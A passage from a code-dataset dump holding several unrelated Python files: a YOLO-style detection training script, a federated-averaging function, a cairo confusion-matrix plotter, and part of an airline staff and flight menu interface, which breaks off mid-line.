testing\n self.train_dataloader = self.set_dataloader(\n DatasetDetect(self.datasets, 'train', self.image_size, self.augment, self.data_augment, self.hyp),\n shuffle=self.shuffle)\n\n self.val_dataloader = self.set_dataloader(\n DatasetDetect(self.datasets, 'val', self.image_size, coco_gt=self.coco_json['val']))\n\n self.test_dataloader = self.set_dataloader(\n DatasetDetect(self.datasets, 'test', self.image_size, coco_gt=self.coco_json['test'])\n ) if self.datasets['test'] else self.val_dataloader\n\n self.warmup_lr_scheduler = self.load_state_dict(\n WarmUpScheduler(self.optimizer, self.lr_scheduler,\n len_loader=len(self.train_dataloader),\n warmup_steps=self.hyp['warmup_steps'],\n warmup_start_lr=self.hyp['warmup_start_lr'],\n warmup_mode=self.hyp['warmup_mode'],\n verbose=self.hyp['verbose']),\n **self._load_warmup_lr_scheduler\n )\n\n self.val_class = ValDetect\n\n @logging_start_finish('Training')\n def train(self):\n for self.epoch in range(self.start_epoch, self.epochs):\n self.train_one_epoch(('total', 'bbox', 'class', 'object'))\n _, coco_stats = self.val_training()\n\n fitness = compute_fitness(coco_stats[:3], self.hyp['fit_weights']) # compute fitness for best save\n self.save_checkpoint_best_last(fitness, self.path_dict['best'], self.path_dict['last'],\n self.model_state_dict)\n # TODO maybe need a auto stop function for bad training\n\n self.model = self.release_attr()\n coco_eval, _ = self.test_trained()\n\n # save coco results\n self.save_coco_results(coco_eval, self.path_dict['coco_results'])\n\n # release all\n self.close_tensorboard()\n self.release_cuda_cache()\n\n @torch.no_grad()\n def val_training(self):\n if self.swa_start:\n model = self.swa_model.module\n else:\n model = self.model\n valer = self.val_class(model=model, half=True, dataloader=self.val_dataloader,\n loss_fn=self.loss_fn, cls_names=self.datasets['names'],\n epoch=self.epoch, writer=self.writer, visual_image=self.visual_image,\n coco_json=self.coco_json, hyp=self.hyp)\n results = valer.val_training()\n return results\n\n # @torch.inference_mode()\n @torch.no_grad()\n def test_trained(self):\n self.epoch = -1\n\n self.checkpoint = self.load_checkpoint(self.path_dict['best'])\n if self.checkpoint is None:\n self.checkpoint = self.load_checkpoint(self.path_dict['last'])\n LOGGER.info('Load last.pt for validating because of no best.pt')\n else:\n LOGGER.info('Load best.pt for validating')\n\n model = self.checkpoint['swa_model'].float().to(self.device)\n\n tester = self.val_class(model=model, half=False, dataloader=self.test_dataloader,\n loss_fn=self.loss_fn, cls_names=self.datasets['names'],\n epoch=self.epoch, writer=self.writer, visual_image=self.visual_image,\n coco_json=self.coco_json, hyp=self.hyp)\n results = tester.val_training()\n return results\n\n def visual_dataset(self, dataset, name):\n WRITER.add_datasets_images_labels_detect(self.writer, dataset, name)\n\n def update_swa_attr(self):\n pass\n\n def preprocess_iter(self, data, data_dict):\n x, labels, other_data, data_dict = super(TrainDetect, self).preprocess_iter(data, data_dict)\n x /= 255\n return x, labels, other_data, data_dict\n\n @staticmethod\n def mean_loss(index, loss_mean, loss, data_dict):\n (loss_items,) = data_dict['other_loss_iter']\n loss = torch.cat((loss.detach(), loss_items.detach()))\n loss_mean = loss_to_mean(index, loss_mean, loss)\n return loss_mean, data_dict\n\n\ndef parse_args_detect(known: bool = False):\n r\"\"\"\n Parse args for training.\n Args:\n known: bool = True or False, Default=False.\n parser will get two namespace which the second is unknown args, if known=True.\n\n Returns:\n namespace(for setting args)\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--tensorboard', type=bool,\n default=True, help='Use tensorboard to make visual')\n parser.add_argument('--visual_image', type=bool,\n default=True, help='Make image (train val test) visual')\n parser.add_argument('--visual_graph', type=bool,\n default=False, help='Make model graph visual')\n parser.add_argument('--swa_start_epoch', type=int,\n default=50, help='swa start')\n parser.add_argument('--swa_c', type=int,\n default=1, help='swa cycle length')\n parser.add_argument('--weights', type=str,\n default='F:/weights/yolov5/yolov5s_v6_sd.pt', help='The path of checkpoint')\n # parser.add_argument('--weights', type=str,\n # default=str(ROOT / 'runs/train/detect/exp8/weights/best.pt'), help='The path of checkpoint')\n # parser.add_argument('--weights', type=str, default='', help='The path of checkpoint')\n parser.add_argument('--freeze_names', type=list,\n default=['backbone', 'neck'], help='Layer name to freeze in model')\n parser.add_argument('--device', type=str,\n default='0', help='Use cpu or cuda:0 or 0')\n parser.add_argument('--epochs', type=int,\n default=10, help='The epochs for training')\n parser.add_argument('--batch_size', type=int,\n default=16, help='The batch size in training')\n parser.add_argument('--workers', type=int,\n default=0, help='For dataloader to load data')\n parser.add_argument('--shuffle', type=bool,\n default=True, help='Shuffle the training data')\n parser.add_argument('--pin_memory', type=bool,\n default=False, help='Load data to memory')\n parser.add_argument('--datasets', type=str,\n default=str(ROOT / 'data/datasets/detection/Customdatasets.yaml'),\n help='The path of datasets.yaml')\n parser.add_argument('--save_name', type=str,\n default='exp', help='The name of save dir')\n parser.add_argument('--save_path', type=str,\n default=str(ROOT / 'runs/train/detect'), help='The save path of results')\n parser.add_argument('--hyp', type=str,\n default=str(ROOT / 'data/hyp/hyp_detect_train.yaml'), help='The path of hyp.yaml')\n parser.add_argument('--augment', type=bool,\n default=False, help='Use random augment image')\n parser.add_argument('--data_augment', type=str,\n default='', help='The kind of data augmentation mosaic / mixup / cutout')\n parser.add_argument('--inc', type=int,\n default=3, help='The image channel to input')\n parser.add_argument('--image_size', type=int,\n default=640, help='The size of input image')\n parser.add_argument('--model_state_dict', type=bool,\n default=False, help='save model state_dict or model')\n\n parser.add_argument('--load_model',\n default={'load_key': 'model_state_dict', 'state_dict_operation': False, 'load': 'state_dict'},\n help='')\n parser.add_argument('--load_swa_model',\n default={'load_key': 'swa_model', 'state_dict_operation': True, 'load': None,\n 'load_n_averaged_key': None},\n help='')\n parser.add_argument('--load_optimizer',\n default={'load_key': None},\n help='')\n parser.add_argument('--load_lr_scheduler',\n default={'load_key': None},\n help='')\n parser.add_argument('--load_warmup_lr_scheduler',\n default={'load_key': None},\n help='')\n parser.add_argument('--load_gradscaler',\n default={'load_key': None},\n help='')\n parser.add_argument('--load_start_epoch',\n default={'load_key': None, 'load': None},\n help='')\n parser.add_argument('--load_best_fitness',\n default={'load_key': None},\n help='')\n namespace = parser.parse_known_args()[0] if known else parser.parse_args()\n return namespace\n\n\n@timer\ndef train_detection():\n arguments = parse_args_detect()\n trainer = TrainDetect(arguments)\n trainer.train()\n\n\nif __name__ == '__main__':\n train_detection()\n\n # in the future\n # TODO colour str\n # TODO learn moviepy library sometimes\n\n # when need because it is complex\n # TODO add FLOPs compute module for model\n # TODO auto compute anchors\n\n # next work\n # TODO add necessary functions\n # TODO confusion matrix needed\n # TODO add plot curve functions for visual results\n # TODO design model structure\n","repo_name":"LEFTeyex/visual-framework","sub_path":"src/visual/demo/train_detect.py","file_name":"train_detect.py","file_ext":"py","file_size_in_byte":16346,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"73567828732","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport copy\nimport torch\nfrom torch import nn\nimport numpy as np\n\ndef FedAvg(w,alpha):\n w_avg = copy.deepcopy(w[0])\n n_clients = len(w)\n \n alpha = alpha/np.sum(alpha)\n #print(np.sum(alpha))\n #print(alpha)\n #alpha = np.random.uniform(0,1,n_clients)\n \n for l in w_avg.keys():\n w_avg[l] = w_avg[l] - w_avg[l]\n\n for l, layer in enumerate(w_avg.keys()): #for each layer\n w_kl = []\n for k in range(0,n_clients): #for each client\n w_avg[layer] += alpha[k]*w[k][layer]\n return w_avg\n","repo_name":"edvinli/federated-learning-mixture","sub_path":"models/FederatedAveraging.py","file_name":"FederatedAveraging.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"14587874734","text":"#!/usr/bin/env python\n\nimport sys\nfrom optparse import OptionParser\nimport numpy as np\nimport cairo\nfrom cpf.profiling.leave_one_out import confusion_matrix\nfrom cpf.profiling.confusion import load_confusion\n\ndef normal_font(ctx):\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_font_size(7)\n ctx.select_font_face('Helvetica')\n\ndef bold_font(ctx):\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_font_size(7)\n ctx.select_font_face('Helvetica', cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_BOLD)\n\ndef small_font(ctx):\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_font_size(7)\n ctx.select_font_face('Helvetica')\n\n\nclass Title(object):\n def __init__(self, title):\n self.title = title\n\n def set_font(self, ctx):\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_font_size(7)\n ctx.select_font_face('Helvetica', cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_BOLD)\n\n def height(self, ctx):\n if self.title:\n ctx.save()\n self.set_font(ctx)\n h = ctx.text_extents(self.title)[3]\n ctx.restore()\n return h + 5\n else:\n return 0\n\n def draw(self, ctx):\n if self.title:\n self.set_font(ctx)\n h = self.height(ctx) - 5\n ctx.move_to(0, h)\n ctx.show_text(self.title)\n ctx.stroke()\n\n\nclass Header(object):\n strings = ['True mechanistic class', 'Predicted class', 'Acc.']\n\n def set_font(self, ctx):\n normal_font(ctx)\n\n def height(self, ctx):\n ctx.save()\n self.set_font(ctx)\n h = max([ctx.text_extents(s)[3] for s in self.strings])\n ctx.restore()\n return h + 5\n\n def draw(self, ctx, matrix_left, matrix_size, figure_width):\n self.set_font(ctx)\n h = self.height(ctx) - 5\n ctx.move_to(0, h)\n ctx.show_text(self.strings[0])\n\n w = ctx.text_extents(self.strings[1])[4]\n x2c = matrix_left + 0.5 * matrix_size\n ctx.move_to(x2c - w / 2.0, h)\n ctx.show_text(self.strings[1])\n\n w = ctx.text_extents(self.strings[2])[4]\n ctx.move_to(figure_width - w, h)\n ctx.show_text(self.strings[2])\n\n ctx.stroke()\n\n\nclass Subheader(object):\n def __init__(self, codes):\n self.codes = codes\n\n def set_font(self, ctx):\n small_font(ctx)\n\n def height(self, ctx):\n ctx.save()\n self.set_font(ctx)\n h = max([ctx.text_extents(s)[3] for s in self.codes])\n ctx.restore()\n return h + 5\n\n def draw(self, ctx, matrix_left, matrix_width):\n self.set_font(ctx)\n h = self.height(ctx) - 5\n tile_size = matrix_width / len(self.codes)\n for i, code in enumerate(self.codes):\n w = ctx.text_extents(code)[3]\n ctx.move_to(matrix_left + (i + 0.5) * tile_size + w / 2.0, h + 3) # - w / 2.0, h)\n ctx.save()\n ctx.rotate(3 * 3.14/2.0)\n ctx.show_text(code)\n ctx.restore()\n ctx.stroke()\n\nclass Body(object):\n def __init__(self, figure_width, labels, cm, formatter=None):\n self.figure_width = figure_width\n self.labels = labels\n self.cm = cm\n self.accuracies = ['%.0f %%' % (cm[i,i] * 100.0 / cm[i,:].sum())\n for i in range(len(self.labels))]\n if formatter is None:\n self.formatter = lambda i, j: cm[i, j]\n else:\n self.formatter = formatter\n\n def set_font(self, ctx):\n normal_font(ctx)\n\n def set_inner_font(self, ctx):\n small_font(ctx)\n\n def code_left(self, ctx):\n self.set_font(ctx)\n class_width = max([ctx.text_extents(s)[4] for s, code in self.labels])\n return class_width + 5\n\n def matrix_left(self, ctx):\n self.set_font(ctx)\n code_width = max([ctx.text_extents(code)[4] for s, code in self.labels])\n return self.code_left(ctx) + code_width + 5\n\n def matrix_size(self, ctx):\n ctx.save()\n normal_font(ctx)\n acc_width = ctx.text_extents('100 %')[4]\n matrix_size = self.figure_width - self.matrix_left(ctx) - acc_width - 5\n ctx.restore()\n return matrix_size\n\n def matrix_width(self, ctx):\n return self.matrix_size(ctx)\n\n def height(self, ctx):\n return self.matrix_size(ctx) + 5\n\n def draw(self, ctx):\n lw = 0.5\n inner_size = self.matrix_size(ctx) - 2 * lw\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_line_width(lw)\n ml = self.matrix_left(ctx)\n ctx.rectangle(ml + lw, lw, inner_size, inner_size)\n ctx.stroke()\n n = len(self.labels)\n tile_size = inner_size / n\n self.set_inner_font(ctx)\n for i in range(n):\n for j in range(n):\n ctx.rectangle(ml + lw + j * tile_size, lw + i * tile_size,\n tile_size, tile_size)\n ctx.set_source_rgba(1, 0, 0, self.cm[i, j] * 0.8 / self.cm[i,:].sum())\n ctx.fill()\n # Number inside\n ctx.set_source_rgba(0, 0, 0)\n if self.cm.dtype.kind == 'f':\n if self.cm[i, j] < 0.5:\n s = ''\n #elif self.cm[i, j] < 0.95:\n # s = '.%d' % round(self.cm[i, j] * 10.0)\n else:\n s = '%d' % round(self.cm[i, j])\n elif self.cm.dtype.kind == 'i':\n if self.cm[i, j] == 0:\n s = ''\n else:\n s = '%d' % self.cm[i, j]\n else:\n s = str(self.cm[i, k])\n h, w = ctx.text_extents(s)[3:5]\n ctx.move_to(ml + lw + (j + 0.5) * tile_size - 0.5 * w,\n lw + (i + 0.5) * tile_size + 0.5 * h)\n ctx.show_text(s)\n ctx.stroke()\n\n ctx.set_source_rgb(0, 0, 0) # black\n\n self.set_font(ctx)\n cl = self.code_left(ctx)\n for i, (s, code) in enumerate(self.labels):\n h = ctx.text_extents(s)[3]\n y = (i + 0.5) * tile_size + h / 2.0\n ctx.move_to(0, y)\n ctx.show_text(s)\n ctx.move_to(cl, y)\n ctx.show_text(code)\n\n for i, acc in enumerate(self.accuracies):\n h, w = ctx.text_extents(acc)[3:5]\n y = (i + 0.5) * tile_size + h / 2.0\n ctx.move_to(self.figure_width - w, y)\n ctx.show_text(acc)\n ctx.stroke()\n\n\nclass Footer(object):\n def __init__(self, figure_width, cm):\n self.figure_width = figure_width\n self.cm = cm\n self.ncorrect = sum(self.cm[i,i] for i in range(self.cm.shape[0]))\n self.ntotal = self.cm.sum()\n\n def left_font(self, ctx):\n normal_font(ctx)\n\n def left_text(self):\n if self.cm.dtype.kind == 'f':\n return 'Overall accuracy: '\n else:\n return 'Overall accuracy: %d / %d = ' % (self.ncorrect, self.ntotal)\n\n def right_font(self, ctx):\n bold_font(ctx)\n\n def right_text(self):\n return '%.0f %%' % (self.ncorrect * 100.0 / self.ntotal)\n\n def height(self, ctx):\n ctx.save()\n self.left_font(ctx)\n h1 = ctx.text_extents(self.left_text())[3]\n self.right_font(ctx)\n h2 = ctx.text_extents(self.right_text())[3]\n ctx.restore()\n return max(h1, h2)\n\n def draw(self, ctx):\n y = self.height(ctx) - 3\n\n self.right_font(ctx)\n s = self.right_text()\n wr = ctx.text_extents(s)[4]\n ctx.move_to(self.figure_width - wr, y)\n ctx.show_text(s)\n\n self.left_font(ctx)\n s = self.left_text()\n wl = ctx.text_extents(s)[4]\n ctx.move_to(self.figure_width - wr - wl, y)\n ctx.show_text(s)\n\n ctx.stroke()\n\n\nclass Figure(object):\n def __init__(self, figure_width, labels, cm, title=None):\n self.figure_width = figure_width\n self.title = Title(title)\n self.header = Header()\n codes = [code for s, code in labels]\n self.subheader = Subheader(codes)\n self.body = Body(figure_width, labels, cm)\n self.footer = Footer(figure_width, cm)\n\n def height(self, ctx):\n return (self.title.height(ctx) + self.header.height(ctx) +\n self.subheader.height(ctx) +\n self.body.height(ctx) + self.footer.height(ctx))\n\n def draw(self, ctx):\n matrix_left = self.body.matrix_left(ctx)\n matrix_size = self.body.matrix_size(ctx)\n self.title.draw(ctx)\n ctx.translate(0, self.title.height(ctx))\n self.header.draw(ctx, matrix_left, matrix_size, self.figure_width)\n ctx.translate(0, self.header.height(ctx))\n self.subheader.draw(ctx, matrix_left, matrix_size)\n ctx.translate(0, self.subheader.height(ctx))\n self.body.draw(ctx)\n ctx.translate(0, self.body.height(ctx))\n self.footer.draw(ctx)\n\nclass Page(object):\n def __init__(self, figure, margin=0):\n self.figure = figure\n self.margin = margin\n\n def height(self, ctx):\n return self.figure.height(ctx) + 2 * self.margin\n\n def draw(self, ctx):\n ctx.save()\n ctx.translate(margin, margin)\n self.figure.draw(ctx)\n ctx.restore()\n\n\ncode_map = dict([('Actin disruptors', 'Act'),\n ('Aurora kinase inhibitors', 'Aur'),\n ('Cholesterol-lowering', 'Ch'),\n ('DNA damage', 'DD'),\n ('DNA replication', 'DR'),\n ('Epithelial', 'Epi'),\n ('Kinase inhibitors', 'KI'),\n ('Monoaster', 'MA'),\n ('Eg5 inhibitors', 'Eg5'),\n ('Microtubule stabilizers', 'MS'),\n ('Microtubule destabilizers', 'MD'),\n ('Protein degradation', 'PD'),\n ('Protein synthesis', 'PS'),\n # Loo et al.\n ('Actin', 'Act'),\n ('Calcium regulation', 'Ca'),\n ('Cholesterol', 'Cho'),\n ('Cyclooxygenase', 'Cyc'),\n ('Energy metabolism', 'En'),\n ('Histone deacetylase', 'HD'),\n ('Kinase', 'Kin'),\n ('Microtubule', 'MT'),\n ('Neurotransmitter', 'Ne'),\n ('Nuclear receptor', 'Nu'),\n ('Topoisomerase', 'Topo'),\n ('Vesicle trafficing', 'Ves'),\n ('Metal homeostasis', 'MH')])\n\nparser = OptionParser(\"usage: %prog [-f] [-t TITLE] INPUT-FILE OUTPUT-FILE\")\nparser.add_option('-f', dest='float', action='store_true', help='use floating-point accuracies')\nparser.add_option('-t', dest='title', help='title')\noptions, args = parser.parse_args()\nif len(args) != 2:\n parser.error('Incorrect number of arguments')\ninput_filename, output_filename = args\n\nconfusion = load_confusion(input_filename)\ncm = confusion_matrix(confusion, 'if'[options.float or 0])\nlabels = [(l, code_map.get(l, l))\n for l in sorted(set(a for a, b in confusion.keys()))]\n\nfigure_width = 3.44 * 72\nfigure = Figure(figure_width, labels, cm, options.title)\nmargin = 0\npage = Page(figure, margin)\n\nsurface_width = figure_width + 2 * margin\nsurface_height = 675.36 + 2 * margin\nsurface = cairo.PDFSurface(output_filename, surface_width, surface_height)\nctx = cairo.Context(surface)\nsurface.set_size(surface_width, page.height(ctx))\npage.draw(ctx)\nsurface.show_page()\nsurface.finish()\n","repo_name":"carpenterlab/2016_Pawlowski_MLCB","sub_path":"code/evaluation/pretty-confusion-matrix.py","file_name":"pretty-confusion-matrix.py","file_ext":"py","file_size_in_byte":11440,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"30543835700","text":"import UIAPI\nimport datetime\n\ndef printObjects(name):\n if type(name) == str:\n print(name)\n elif type(name) != list:\n print(\"\")\n print(name)\n print(\"\")\n else:\n for count, theObject in enumerate(name):\n if len(name) > 4:\n if count >= 4:\n if count % 4 == 0:\n printNext = input(\"\\nPress enter to see next (q to quit):\")\n printNext = printNext.lower()\n if printNext == \"q\":\n return None\n print(\"\")\n print(theObject)\n print(\"\")\n\ndef makeDateFromInput():\n day, month, year = None, None, None\n dateInput = \"\"\n dateOutput = \"\"\n while True:\n dateInput = input(\" - Input date(f.x. 24/12/2019), b for back: \")\n if dateInput == \"b\":\n dateOutput = \"b\"\n break\n else:\n try:\n day, month, year = map(int, dateInput.split('/'))\n dateOutput = datetime.datetime(year, month, day)\n break\n except Exception:\n print(\"Wrong input, try again!\")\n return dateOutput\n\nclass View():\n def __init__(self):\n self.uiapi = UIAPI.UIAPI()\n\n def viewMenu(self):\n print('''View Data\n--------------------------------------------\n 1. View Worker\n 2. View Airplane\n 3. View Flight routes\n 4. View Voyages\n 5. View Flight\n--------------------------------------------''')\n\n viewMenuInput = input(\"Input choice (q to Quit, b for back): \")\n viewMenuInput = viewMenuInput.lower()\n if viewMenuInput == \"1\":\n viewWorkerOutput = View.viewWorker(self)\n if viewWorkerOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"2\":\n viewAirplaneOutput = View.viewAirplane(self)\n if viewAirplaneOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"3\":\n viewFlightRoutesOutput = View.viewFlightRoutes(self)\n if viewFlightRoutesOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"4\":\n viewVoyagesOutput = View.viewVoyages(self)\n if viewVoyagesOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"5\":\n viewFlightOutput = View.viewFlight(self)\n if viewFlightOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"b\":\n return viewMenuInput\n elif viewMenuInput == \"q\":\n return viewMenuInput\n else:\n print(\"Wrong input, try again!\")\n viewMenuInput = View.viewMenu(self)\n return viewMenuInput\n\n def viewWorker(self): \n print('''1. View Worker\n--------------------------------------------\n 1. View Pilots\n 2. View Attendants\n 3. View Managers\n 4. View All Staff\n--------------------------------------------''')\n\n viewWorkerInput = input(\"Input choice (q to Quit, b for back): \")\n viewWorkerInput = viewWorkerInput.lower()\n if viewWorkerInput == \"1\":\n viewPilotsOutput = View.viewPilots(self)\n if viewPilotsOutput == \"b\":\n viewWorkerInput = View.viewWorker(self)\n elif viewPilotsOutput == \"q\":\n return viewWorkerInput\n else:\n viewWorkerInput = View.viewWorker(self)\n elif viewWorkerInput == \"2\":\n viewAttendantsOutput = View.viewAttendants(self)\n if viewWorkerInput == \"b\":\n viewWorkerInput = View.viewWorker(self)\n elif viewAttendantsOutput == \"q\":\n return viewWorkerInput\n else:\n viewWorkerInput = View.viewWorker(self)\n elif viewWorkerInput == \"3\":\n viewManagersInput = View.viewManagers(self)\n if viewManagersInput == \"b\":\n viewWorkerInput = View.viewWorker(self)\n elif viewManagersInput == \"q\":\n return viewWorkerInput\n viewWorkerInput = View.viewWorker(self)\n elif viewWorkerInput == \"4\":\n allStaff = UIAPI.UIAPI.viewAllWorkers(self)\n printObjects(allStaff)\n viewWorkerInput = View.viewWorker(self)\n elif viewWorkerInput == \"b\":\n return viewWorkerInput\n elif viewWorkerInput == \"q\":\n return viewWorkerInput\n else:\n print(\"Wrong input, try again\")\n viewWorkerInput = View.viewWorker(self)\n return viewWorkerInput\n\n # Pilots\n def viewPilots(self):\n print('''1.1. View Pilots\n--------------------------------------------\n 1. View specific pilot\n 2. View all pilots\n 3. View all pilots who are not working on \n specific date\n 4. View all pilots who are working on \n specific date\n 5. View all voyages of a pilot in a given \n week\n 6. View all Pilots with certain \n plane license\n--------------------------------------------''')\n viewPilotsInput = input(\" - Input choice (q to Quit, b for back): \")\n viewPilotsInput = viewPilotsInput.lower()\n if viewPilotsInput == \"1\":\n pilotSSN = input(\"Input SSN with no spaces in between: \")\n pilot = UIAPI.UIAPI.viewWorkerBySSn(self, pilotSSN, \"Pilot\")\n printObjects(pilot)\n return viewPilotsInput\n elif viewPilotsInput == \"2\":\n allPilots = UIAPI.UIAPI.viewWorkerByPOS(self, \"Pilot\")\n printObjects(allPilots)\n return viewPilotsInput\n elif viewPilotsInput == \"3\":\n viewPilotNotDate = makeDateFromInput()\n if viewPilotNotDate != \"b\":\n availablePilots = UIAPI.UIAPI.listWorkersbydate(self, viewPilotNotDate, \"Pilot\", \"Available\")\n printObjects(availablePilots)\n return viewPilotsInput\n elif viewPilotsInput == \"4\":\n viewPilotDate = makeDateFromInput()\n if viewPilotDate != \"b\":\n unavailablePilots = UIAPI.UIAPI.listWorkersbydate(self, viewPilotDate, \"Pilot\", \"Unavailable\")\n printObjects(unavailablePilots)\n return viewPilotsInput\n elif viewPilotsInput == \"5\":\n while True:\n pilotSSN = input(\" - Input SSN with no spaces in between, b for back: \")\n if pilotSSN == \"b\":\n return viewPilotsInput\n pilotYear = input(\" - Input year, b for back: \")\n if pilotYear == \"b\":\n return viewPilotsInput\n pilotWeek = input(\" - Input week of the year, b for back: \")\n if pilotWeek == \"b\":\n return viewPilotsInput\n pilotWeeklyVoyages = UIAPI.UIAPI.viewallVoyagesInWeek(self, pilotSSN, pilotYear, pilotWeek, \"Pilot\")\n printObjects(pilotWeeklyVoyages)\n return viewPilotsInput\n elif viewPilotsInput == \"6\":\n pilotLicence = input(\" - Input Plane Licence: \")\n planePilots = UIAPI.UIAPI.viewWorkersByPlaneLicence(self, pilotLicence)\n printObjects(planePilots)\n elif viewPilotsInput == \"b\":\n return viewPilotsInput\n elif viewPilotsInput == \"q\":\n return viewPilotsInput\n else:\n print(\"Wrong input, try again\")\n viewPilotsInput = View.viewPilots(self)\n #return viewPilotsInput\n return viewPilotsInput\n\n def viewAttendants(self):\n print('''1.2. View Attendants\n--------------------------------------------\n 1. View specific attendant\n 2. View all attendants\n 3. View all attendants who are not working on \n specific date\n 4. View all attendants who are working on \n specific date\n 5. View all voyages of an attendant in a given \n week\n--------------------------------------------''')\n viewAttendantsInput = input(\"Input choice (q to Quit, b for back): \")\n viewAttendantsInput = viewAttendantsInput.lower()\n if viewAttendantsInput == \"1\":\n attendantSSN = input(\" - Input SSN with no spaces in between: \")\n Attendant = UIAPI.UIAPI.viewWorkerBySSn(self, attendantSSN, \"Attendant\")\n printObjects(Attendant)\n return viewAttendantsInput\n elif viewAttendantsInput == \"2\":\n allAttendants = UIAPI.UIAPI.viewWorkerByPOS(self, \"Attendant\")\n printObjects(allAttendants)\n return viewAttendantsInput\n elif viewAttendantsInput == \"3\":\n viewAttendantNotDate = makeDateFromInput()\n if viewAttendantNotDate != \"b\":\n availableAttendants = UIAPI.UIAPI.listWorkersbydate(self, viewAttendantNotDate, \"Attendant\", \"Available\")\n printObjects(availableAttendants)\n return viewAttendantsInput\n elif viewAttendantsInput == \"4\":\n viewAttendantDate = makeDateFromInput()\n if viewAttendantDate != \"b\":\n unavailableAttendants = UIAPI.UIAPI.listWorkersbydate(self, viewAttendantDate, \"Attendant\", \"Unavailable\")\n printObjects(unavailableAttendants)\n return viewAttendantsInput\n elif viewAttendantsInput == \"5\":\n attendantSSN = input(\" - Input SSN with no spaces in between: \")\n attendantYear = input(\" - Input year: \")\n attendantWeek = input(\" - Input week of the year: \")\n attendantWeeklyVoyages = UIAPI.UIAPI.viewallVoyagesInWeek(self, attendantSSN, attendantYear, attendantWeek, \"Attendant\")\n printObjects(attendantWeeklyVoyages)\n return viewAttendantsInput\n elif viewAttendantsInput == \"b\":\n return viewAttendantsInput\n elif viewAttendantsInput == \"q\":\n return viewAttendantsInput\n else:\n print(\"Wrong input, try again!\")\n viewAttendantsInput = View.viewAttendants(self)\n return viewAttendantsInput\n\n def viewManagers(self):\n print('''1.2. View Managers\n--------------------------------------------\n 1. View specific manager\n 2. View all managers\n--------------------------------------------''')\n viewManagersInput = input(\"Input choice (q to Quit, b for Back): \")\n viewManagersInput = viewManagersInput.lower()\n if viewManagersInput == \"1\":\n managerSSN = input(\" - Input SSN with no spaces in between: \")\n Manager = UIAPI.UIAPI.viewWorkerBySSn(self, managerSSN, \"Manager\")\n printObjects(Manager)\n return viewManagersInput\n elif viewManagersInput == \"2\":\n allManagers = UIAPI.UIAPI.viewWorkerByPOS(self, \"Manager\")\n printObjects(allManagers)\n return viewManagersInput\n elif viewManagersInput == \"b\":\n return viewManagersInput\n elif viewManagersInput == \"q\":\n return viewManagersInput\n else:\n print(\"Wrong input, try again!\")\n viewManagersInput = View.viewManagers(self)\n return viewManagersInput\n\n def viewAirplane(self):\n print('''2. View Airplane\n--------------------------------------------\n 1. View specific airplane\n 2. View all airplanes\n--------------------------------------------''')\n\n viewAirplaneInput = input(\"Input choice (q to Quit, b for Back): \")\n viewAirplaneInput = viewAirplaneInput.lower()\n if viewAirplaneInput == \"1\":\n AirplaneReg = input(\" - Input airplane registration: \")\n Airplane = UIAPI.UIAPI.viewCertainAirplane(self, AirplaneReg) \n printObjects(Airplane)\n viewAirplaneInput = View.viewAirplane(self)\n elif viewAirplaneInput == \"2\":\n allPlanes = UIAPI.UIAPI.viewAllAirplanes(self)\n printObjects(allPlanes)\n viewAirplaneInput = View.viewAirplane(self)\n elif viewAirplaneInput == \"b\":\n return viewAirplaneInput\n elif viewAirplaneInput == \"q\":\n return viewAirplaneInput\n else:\n print(\"Wrong input, try again!\")\n viewAirplaneInput = View.viewAirplane(self)\n return viewAirplaneInput\n \t\n def viewFlightRoutes(self):\n print('''3. View Flight Routes\n--------------------------------------------\n 1. View specific route\n 2. View all flight routes\n--------------------------------------------''')\n\n viewFlightRoutesInput = input(\"Input choice (q to Quit, b for Back): \")\n viewFlightRoutesInput = viewFlightRoutesInput.lower()\n if viewFlightRoutesInput == \"1\":\n flightRouteID = input(\" - Input Flight Route ID: \")\n flightRoute = UIAPI.UIAPI.viewFlightRoute(self, flightRouteID)\n printObjects(flightRoute)\n viewFlightRoutesInput = View.viewFlightRoutes(self)\n elif viewFlightRoutesInput == \"2\":\n allFlightRoutes = UIAPI.UIAPI.viewAllFlightRoutes(self)\n printObjects(allFlightRoutes)\n viewFlightRoutesInput = View.viewFlightRoutes(self)\n elif viewFlightRoutesInput == \"b\":\n return viewFlightRoutesInput\n elif viewFlightRoutesInput == \"q\":\n return viewFlightRoutesInput\n else:\n print(\"Wrong input, try again!\")\n viewFlightRoutesInput = View.viewFlightRoutes(self)\n return viewFlightRoutesInput\n\n def viewVoyages(self):\n print('''4. View Voyages\n--------------------------------------------\n 1. View a specific voyage\n 2. View all voyages\n 3. View all voyages on a given day\n 4. View all voyages in a given week\n--------------------------------------------''')\n\n viewVoyagesInput = input(\"Input choice (q to Quit, b for Back): \")\n viewVoyagesInput = viewVoyagesInput.lower()\n if viewVoyagesInput == \"1\":\n voyageID = input(\" - Input Voyage ID: \")\n voyage = UIAPI.UIAPI.viewVoyage(self, voyageID)\n printObjects(voyage)\n viewVoyagesInput = View.viewVoyages(self)\n elif viewVoyagesInput == \"2\":\n voyages = UIAPI.UIAPI.viewallVoyages(self)\n printObjects(voyages)\n viewVoyagesInput = View.viewVoyages(self)\n elif viewVoyagesInput == \"3\":\n voyageDate = makeDateFromInput()\n if voyageDate != \"b\":\n allVoyagesDay = UIAPI.UIAPI.viewallVoyagesDay(self, voyageDate)\n printObjects(allVoyagesDay)\n viewVoyagesInput = View.viewVoyages(self)\n elif viewVoyagesInput == 